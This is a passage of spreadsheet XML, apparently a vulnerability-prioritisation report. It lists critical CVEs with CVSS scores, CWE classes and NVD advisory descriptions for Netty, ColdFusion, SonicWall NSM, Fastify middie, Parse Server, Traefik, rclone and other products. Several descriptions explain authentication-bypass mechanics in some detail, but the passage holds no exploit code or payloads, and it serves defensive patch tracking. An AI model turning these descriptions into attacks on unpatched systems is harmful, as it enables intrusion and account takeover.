      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="C675" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D675" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G675" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L675" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Fina and 4.2.17.Final, io.netty.handler.ssl.SslClientHelloHandler#decode checks the wrong offset before reading the four-byte TLS handshake header, so a ClientHello whose handshake header spans records can cause an IndexOutOfBoundsException and invoke select(ctx, null). This selects the default SslContext instead of the SNI-specific context. In deployments where per-SNI clientAuth=REQUIRE is the sole mutual TLS gate, the default SslContext uses clientAuth=NONE or clientAuth=OPTIONAL, and no application-layer certificate verification exists, an unauthenticated remote attacker can bypass the protected route's mutual TLS requirement. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75746</t>
        </is>
      </c>
      <c r="C676" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D676" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L676" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker with high privileges could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77337</t>
        </is>
      </c>
      <c r="C677" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D677" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-770</t>
        </is>
      </c>
      <c r="L677" s="5" t="inlineStr">
        <is>
          <t>CakePHP Authentication is an authentication plugin for CakePHP that can also be used in PSR-7 based applications. Versions before 2.11.2, from 3.0.0 through 3.3.6, and from 4.0.0 through 4.2.0 allow authentication bypass and potential CPU or memory exhaustion when CookieAuthenticator uses unencrypted, forgeable legacy tokens. This issue is fixed in versions 2.11.2, 3.3.7, and 4.2.1.</t>
        </is>
      </c>
      <c r="M677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77337</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78327</t>
        </is>
      </c>
      <c r="C678" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D678" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L678" s="5" t="inlineStr">
        <is>
          <t>An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows an authenticated attacker with SuperAdmin privileges to inject arbitrary commands that are executed on the underlying host, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78327</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78328</t>
        </is>
      </c>
      <c r="C679" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D679" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L679" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows a lower-privileged Admin user to escalate privileges to SuperAdmin.</t>
        </is>
      </c>
      <c r="M679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78328</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78361</t>
        </is>
      </c>
      <c r="C680" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D680" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L680" s="5" t="inlineStr">
        <is>
          <t>The zipMoney(Zip Co) Payments Plugin for WooCommerce WordPress plugin before 2.4.0 does not perform any authorisation checks on one of its front-end request handlers, and does not restrict which option name a caller may supply, allowing unauthenticated users to delete arbitrary WordPress options. This can be used to destroy site and access control configuration, deactivate every installed zipMoney(Zip Co) Payments Plugin for WooCommerce WordPress plugin before 2.4.0, and take the site offline.</t>
        </is>
      </c>
      <c r="M680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78361</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="C681" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D681" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G681" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L681" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the SellerAuthorizeAspect component of springboot-project v1.0.0 allows unauthenticated attackers to access all seller management interfaces and list all products/orders, put products on/off sale, finish/cancel orders, and modify categories without authentication.</t>
        </is>
      </c>
      <c r="M681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80164</t>
        </is>
      </c>
      <c r="C682" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D682" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I682" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L68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682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80164</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80181</t>
        </is>
      </c>
      <c r="C683" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D683" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G683" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L683" s="5" t="inlineStr">
        <is>
          <t>Apache Allura's webhooks are vulnerable to Server-Side Request Forgery (SSRF).
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80181</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80424</t>
        </is>
      </c>
      <c r="C684" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D684" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L684" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to create arbitrary files due to path traversal during archive extraction.</t>
        </is>
      </c>
      <c r="M684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80424</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81468</t>
        </is>
      </c>
      <c r="C685" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D685" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L685" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="M685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81468</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81939</t>
        </is>
      </c>
      <c r="C686" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D686" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr">
        <is>
          <t>A Zip Slip vulnerability in the SonicWall Network Security Manager (NSM) On-Prem file upload and archive processing functionality allows an attacker to extract files outside the intended destination directory using a specially crafted archive.</t>
        </is>
      </c>
      <c r="M686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81939</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84939</t>
        </is>
      </c>
      <c r="C687" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D687" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G687" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L687" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability in Apache FreeMarker template loading mechanism, if the attacker can specify an arbitrary malformed locale identifier to FreeMarker, and the localized lookup configuration setting is enabled (it's by default enabled).
This issue affects Apache FreeMarker from 2.2.0 through 2.3.34.
Users are recommended to upgrade to version 2.3.35. Disabling localized lookup in previous versions also mitigates this.
Note that even in versions affected by this vulnerability, the files that can be loaded remain restricted by the TemplateLoader that FreeMarker is configured to use. In particular, FileTemplateLoader prevents attempts to traverse outside the baseDir specified in its constructor. Other TemplateLoader implementations may allow access outside their designated base directory, but they are still constrained by the underlying storage mechanism—for example, a loader wrapping a Java class loader can only access resources that the class loader can load, while one wrapping a web application context can only access resources available through that context.</t>
        </is>
      </c>
      <c r="M687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84939</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85043</t>
        </is>
      </c>
      <c r="C688" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D688" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I688" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L688" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Network in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85043</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85184</t>
        </is>
      </c>
      <c r="C689" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D689" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>@fastify/middie versions &gt;= 9.1.0 and before 9.3.4 decide whether to run path-scoped middleware by matching against the raw request target, while the Fastify router resolves an absolute-form request target to its path before dispatching. Because the two layers evaluate different strings, a request using an absolute-form target reaches the route handler while the path-scoped middleware, such as authentication or authorization, is skipped. An unauthenticated network attacker can use this to bypass path-based access controls in a Fastify application that relies on middie for those controls. Users should upgrade to @fastify/middie 9.3.4 or later.</t>
        </is>
      </c>
      <c r="M689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85184</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="C690" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D690" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G690" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t>
        </is>
      </c>
      <c r="M690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86840</t>
        </is>
      </c>
      <c r="C691" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D691" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>The `vtoken-minting` and `slpx` pallets in Bifrost contain an improper authorization vulnerability in channel commission attribution. A signed account can supply an arbitrary registered `channel_id` when minting tokens without verifying that the caller is authorized to mint on behalf of that channel. This allows an attacker to inflate a channel's recorded mint volume and cause protocol commission payments to be disproportionately distributed to that channel during commission settlement.</t>
        </is>
      </c>
      <c r="M691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87806</t>
        </is>
      </c>
      <c r="C692" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D692" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G692" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr">
        <is>
          <t>Parse Server versions &lt;= 8.6.87 and &gt;= 9.0.0 &lt; 9.10.1-alpha.7 contain an authentication bypass in the built-in LDAP authentication adapter. The adapter forwarded the client-supplied password to the directory without verifying that a password had been supplied, and treated any non-error response from the directory as proof of authentication. A zero-length credential turns an LDAP simple bind into the unauthenticated authentication mechanism described in RFC 4513 section 5.1.2, which some directories (including Active Directory in its default configuration) answer with success while mapping the connection to anonymous. As a result, an unauthenticated attacker who knows a directory username can obtain a valid session token for that account, resulting in account takeover. Only deployments that enable the LDAP authentication adapter are affected, and deployments whose directory refuses unauthenticated simple bind (such as a stock OpenLDAP configuration) are not exploitable. The issue is fixed in 8.6.88 and 9.10.1-alpha.7, which require the password to be a non-empty string and reject the request before contacting the directory.</t>
        </is>
      </c>
      <c r="M692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87806</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88007</t>
        </is>
      </c>
      <c r="C693" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D693" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-863</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 2.11.0 until 2.11.57 and 3.7.13, the HTTP/3 entrypoint ConnContext does not call service.AddTransportOnContext, so kerberosRoundTripper uses a shared backend transport instead of a transport dedicated to each frontend connection. With HTTP/3 enabled, a backend using connection-bound NTLM or Negotiate authentication, and backend keep-alive, an unrelated client can reuse a backend connection authenticated for a victim, read victim-only data, and act as that victim without the victim credentials. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88007</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88044</t>
        </is>
      </c>
      <c r="C694" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D694" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.70.0 until 1.75.1, the serve/start RC interface accepts per-server proxyOpt.AuthProxy settings, and the FTP and S3 constructors in cmd/serve/ftp/ftp.go and cmd/serve/s3/server.go incorrectly check the process-global proxy.Opt.AuthProxy value instead. When the global value is empty, the request-local authentication proxy is ignored: FTP falls back to the fixed filesystem with username anonymous and any password, while S3 with AuthKey serves the fixed RC fs rather than the backend selected by the proxy. The dedicated command-line servers that configure the global option are not affected. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88044</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89043</t>
        </is>
      </c>
      <c r="C695" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D695" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L695" s="5" t="inlineStr">
        <is>
          <t>passport-saml-encrypted through 0.1.13 contains an XML signature wrapping vulnerability where signature verification and assertion extraction use independent XPath lookups with no cross-validation. Attackers holding any validly signed SAML message can prepend a forged unsigned assertion that gets accepted as the verified identity while the genuine signature validates against the original assertion.</t>
        </is>
      </c>
      <c r="M695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89043</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89086</t>
        </is>
      </c>
      <c r="C696" s="5" t="n">
        <v>9.1</v>
      </c>
